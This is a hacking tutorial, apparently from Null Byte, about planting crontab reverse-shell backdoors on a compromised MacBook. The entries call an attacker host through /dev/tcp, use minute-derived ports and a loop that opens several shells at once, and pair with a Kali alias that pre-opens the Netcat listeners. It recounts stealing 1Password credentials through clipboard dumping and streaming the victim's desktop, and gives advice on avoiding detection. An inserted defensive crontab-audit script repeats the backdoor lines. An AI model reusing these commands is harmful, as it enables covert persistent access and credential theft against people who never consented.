
How to Spawn Multiple Threaded Netcat Backdoors on a MacBook « Null Byte :: WonderHowTo



With a single command, an attacker can spawn three, five, or even ten new Netcat connections to a compromised MacBook. Without this essential trick, carrying out complex post-exploitation attacks from a single shell can otherwise be difficult.

Why create multiple Netcat threads?

Some post-exploitation macOS attacks require more than one shell. Spawning additional Netcat connections from a single backdoor is possible, but it can be cumbersome and inconvenient. So I came up with a simple solution that relies on the current date to predict the next time and port number the backdoor will use.

Five Netcat connections established at once.

The GIF above shows five Netcat connections being established simultaneously. We can see how convenient it is to move between multiple connections while performing some basic system_profiler situational-awareness attacks.

The following string is an example of a Bash command commonly used with crontab as a macOS backdoor. It creates a single TCP connection to the attacker's system. It is a well-known method of establishing a TCP connection to a Netcat listener, and it can be embedded in the operating system and run every sixty seconds.

* * * * *    bash -i >& /dev/tcp/attacker.com/8080 0>&1

Each time it runs, crontab attempts to connect to the attacker's server on port 8080. If a connection has already been established, however, the command fails silently because the port is busy. Used this way, the attacker's remote access is limited to a single persistent backdoor connection.

The command can be modified to use a dynamic port number, defined by the current minute.

* * * * *    bash -i >& /dev/tcp/attacker.com/$(date +%M) 0>&1

Notice the date command with the %M option. If the time is 10:15, port 15 is used. If the time is 03:42, port 42 is used. Whatever the current minute is, that is the port number. This dramatically reduces the number of port conflicts and allows the attacker to open a new Netcat connection every minute if needed.

Creating predictive Netcat listeners

To create a listener for the dynamic ports, all an attacker needs to do is look at the current time. If it is 19:30, the command below would catch the next connection.

~$ nc -l -p 31

The next expected connection must be used because macOS and Kali share the same clock, which means Kali could miss the connection by being just milliseconds late. The listener and the connection cannot be established at the same moment, so Kali has to be predictive and wait for the next connection attempt.

To automate the process a bit, date can also be used on the Kali side with sixty seconds added.

~$ nc -l -p $(date +%M --date "+60 seconds")

Creating multiple simultaneous connections

It seemed logical to kick things up a notch and have the backdoor create multiple connections at once. The following for loop is a simple example of how this can be achieved.

* * * * *   for i in {1..3};do bash -i >& /dev/tcp/attacker.com/$i$(date +%M) 0>&1 & done

The for loop runs the bash command three times ({1..3}). Three connection attempts every sixty seconds creates a lot of noise on the network but works for demonstration purposes; any more attempts per minute is probably excessive. The variable $i is prepended to the current minute and the result is used as the port number.

If the current time is 05:45, three connections will be made with ports 145, 245 and 345.
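From the defender's side, the crontab patterns above are easy to audit. The following Python script is an added example (not from the original article): it scans crontab text for entries that open a /dev/tcp connection, reports whether the port is derived from the minute, and resolves which ports a given entry would contact at a given minute. The crontab lines inside it are constructed to mirror the article's commands.

```python
import re
from datetime import datetime

# Constructed sample crontab text modelled on the commands discussed above.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * *    bash -i >& /dev/tcp/attacker.com/8080 0>&1
* * * * *    bash -i >& /dev/tcp/attacker.com/$(date +%M) 0>&1
* * * * *   for i in {1..3};do bash -i >& /dev/tcp/attacker.com/$i$(date +%M) 0>&1 & done
"""

DEVTCP_RE = re.compile(r"/dev/tcp/(?P<host>[^/\s]+)/")  # bash's network pseudo-device
BRACE_RE = re.compile(r"\{(\d+)\.\.(\d+)\}")              # {1..3} fan-out loop
MINUTE_RE = re.compile(r"\$\(date \+%M\)")                # minute-derived port


def expand_ports(line, port_expr, minute):
    """Resolve one entry's port expression for the given minute (0-59)."""
    prefixes = [""]
    if "$i" in port_expr:  # loop variable prepended to the minute
        b = BRACE_RE.search(line)
        prefixes = [str(i) for i in range(int(b.group(1)), int(b.group(2)) + 1)] if b else ["?"]
    ports = []
    for p in prefixes:
        expr = MINUTE_RE.sub(f"{minute:02d}", port_expr.replace("$i", p))
        ports.append(int(expr) if expr.isdigit() else expr)
    return ports


def audit_crontab(text, minute):
    """Return one finding per non-comment crontab line that opens a /dev/tcp connection."""
    findings = []
    for line in text.splitlines():
        m = DEVTCP_RE.search(line)
        if line.lstrip().startswith("#") or not m:
            continue
        # The port expression runs from the host's trailing slash to the first redirection.
        port_expr = re.split(r"\s+\d*[<>]", line[m.end():], maxsplit=1)[0].strip()
        ports = expand_ports(line, port_expr, minute)
        findings.append({"host": m.group("host"), "ports": ports, "fan_out": len(ports),
                         "dynamic_port": bool(MINUTE_RE.search(port_expr))})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB, datetime.now().minute):
        print(f"{f['host']}: fan_out={f['fan_out']} dynamic={f['dynamic_port']} ports={f['ports']}")
```

Run it against the output of `crontab -l` for each user to list every entry that dials out through /dev/tcp; at minute 45 the three-way loop resolves to ports 145, 245 and 345, matching the article's example.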

Creating three predictive Netcat listeners by hand is tedious. Tilix is generally my preferred terminal multiplexer because it allows multiple shells in a single window (shown below). It can automatically split (-a) the window while executing (-e) a command.

Tilix can be installed in Kali with the following command.

~$ sudo apt update && sudo apt install tilix

Hit:1 http://dl.google.com/linux/chrome/deb stable InRelease
Hit:3 http://kali.download/kali kali-rolling InRelease
Ign:2 https://dl.bintray.com/etcher/debian stable InRelease
Err:4 https://dl.bintray.com/etcher/debian stable Release
  403  Forbidden [IP: 54.148.239.199 443]
Reading package lists... Done

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
  libgtkd-3-0 libphobos2-ldc-shared91 libvted-3-0 tilix-common
Suggested packages:
  python-nautilus
The following NEW packages will be installed:
  libgtkd-3-0 libphobos2-ldc-shared91 libvted-3-0 tilix tilix-common
0 upgraded, 5 newly installed, 0 to remove and 857 not upgraded.
Need to get 4,053 kB of archives.
After this operation, 25.2 MB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://kali.download/kali kali-rolling/main amd64 libphobos2-ldc-shared91 amd64 1:1.21.0-1+b1 [1,265 kB]
Get:2 http://kali.download/kali kali-rolling/main amd64 libgtkd-3-0 amd64 3.9.0-3+b3 [1,892 kB]
Get:3 http://kali.download/kali kali-rolling/main amd64 libvted-3-0 amd64 3.9.0-3+b3 [86.1 kB]
Get:4 http://kali.download/kali kali-rolling/main amd64 tilix-common all 1.9.3-4 [211 kB]
Get:5 http://kali.download/kali kali-rolling/main amd64 tilix amd64 1.9.3-4+b2 [599 kB]
Fetched 4,053 kB in 1s (3,717 kB/s)
Selecting previously unselected package libphobos2-ldc-shared91:amd64.
(Reading database ... 377083 files and directories currently installed.)
Preparing to unpack .../libphobos2-ldc-shared91_1%3a1.21.0-1+b1_amd64.deb ...
Unpacking libphobos2-ldc-shared91:amd64 (1:1.21.0-1+b1) ...
Selecting previously unselected package libgtkd-3-0.
Preparing to unpack .../libgtkd-3-0_3.9.0-3+b3_amd64.deb ...
Unpacking libgtkd-3-0 (3.9.0-3+b3) ...
Selecting previously unselected package libvted-3-0.
Preparing to unpack .../libvted-3-0_3.9.0-3+b3_amd64.deb ...
Unpacking libvted-3-0 (3.9.0-3+b3) ...
Selecting previously unselected package tilix-common.
Preparing to unpack .../tilix-common_1.9.3-4_all.deb ...
Unpacking tilix-common (1.9.3-4) ...
Selecting previously unselected package tilix.
Preparing to unpack .../tilix_1.9.3-4+b2_amd64.deb ...
Unpacking tilix (1.9.3-4+b2) ...
Setting up tilix-common (1.9.3-4) ...
Setting up libphobos2-ldc-shared91:amd64 (1:1.21.0-1+b1) ...
Setting up libvted-3-0 (3.9.0-3+b3) ...
Setting up libgtkd-3-0 (3.9.0-3+b3) ...
Setting up tilix (1.9.3-4+b2) ...
Processing triggers for desktop-file-utils (0.24-1) ...
Processing triggers for mime-support (3.64) ...
Processing triggers for hicolor-icon-theme (0.17-2) ...
Processing triggers for gnome-menus (3.36.0-1) ...
Processing triggers for libglib2.0-0:amd64 (2.64.2-1) ...
Processing triggers for libc-bin (2.30-4) ...
Processing triggers for man-db (2.9.1-1) ...
Processing triggers for kali-menu (2020.2.2) ...

In the earlier GIF, the "hacker" command was used to spawn five Netcat listeners automatically. This is accomplished with a Bash alias. The alias executes the following function.

hacker ()
{
    for i in {1..3};
    do
        tilix -a session-add-down -e "nc -l -p $i$(date +%M --date "+60 seconds")";
    done
}

In Kali, a for loop with the date command is likewise used to generate the Netcat listeners. The --date "+60 seconds" option has been added, which takes the current time and adds sixty seconds. This ensures the listeners do not miss the next crontab interval.

To create the alias, open the file /root/.bash_aliases with nano and add the function above. Then press Ctrl-X to exit, press Y to confirm, and press Enter to save. If the file does not already exist, nano will create it for you.

~$ sudo nano /root/.bash_aliases

Below is a GIF of multiple shells used in a more realistic scenario.

Two separate attacks occur in the GIF: clipboard dumping to steal 1Password credentials, and desktop streaming to gather intelligence about the target's online behavior. The activity, in order from the top shell to the bottom, is:

  1. Prepares an FFmpeg listener to receive the video stream from the compromised MacBook.
  2. Uses the pbpaste command to dump the MacBook's clipboard every five seconds. 1Password credentials are captured in the process and saved to the /tmp/clipboard.txt file.
  3. Downloads FFmpeg to the MacBook and streams the desktop.
  4. This connection is mostly unused during the attacks. It is used towards the end to read the file /tmp/clipboard.txt and learn the usernames and passwords.
  5. MPV plays the video sent from the MacBook, allowing the attacker to watch the target surfing the web and logging in to a WonderHowTo account using 1Password.

What took two minutes to accomplish could have taken much longer if the attacker had not set up a multi-threaded backdoor. Multiple connections matter when performing several attacks at once.

Final thoughts

All of these examples involve crontab running an arbitrary command every sixty seconds. Realistically, executions could take place once an hour or once every five hours to minimize the amount of traffic coming from the MacBook. All of the predictive examples still apply at hourly or daily intervals.

The possibilities do not end here. While this article targets macOS, similar multi-threaded connections can be configured and automated with PowerShell payloads on Windows 10.

Keep in mind that established Netcat connections are already easy for automated detection systems to spot. For that reason, multiple connections are best used in low-security environments. Too many Netcat threads can also slow the target computer's internet connection or cause it to heat up. Think about how much data each connection generates, because that alone can give the attack away.

If you liked this article, follow me on Twitter @tokyoneon_ and GitHub to keep up with my current projects. For questions and problems, leave a comment or let me know on Twitter.


Cover photo by Pixabay / PEXELS; screenshots and GIFs by tokyoneon / Null Byte
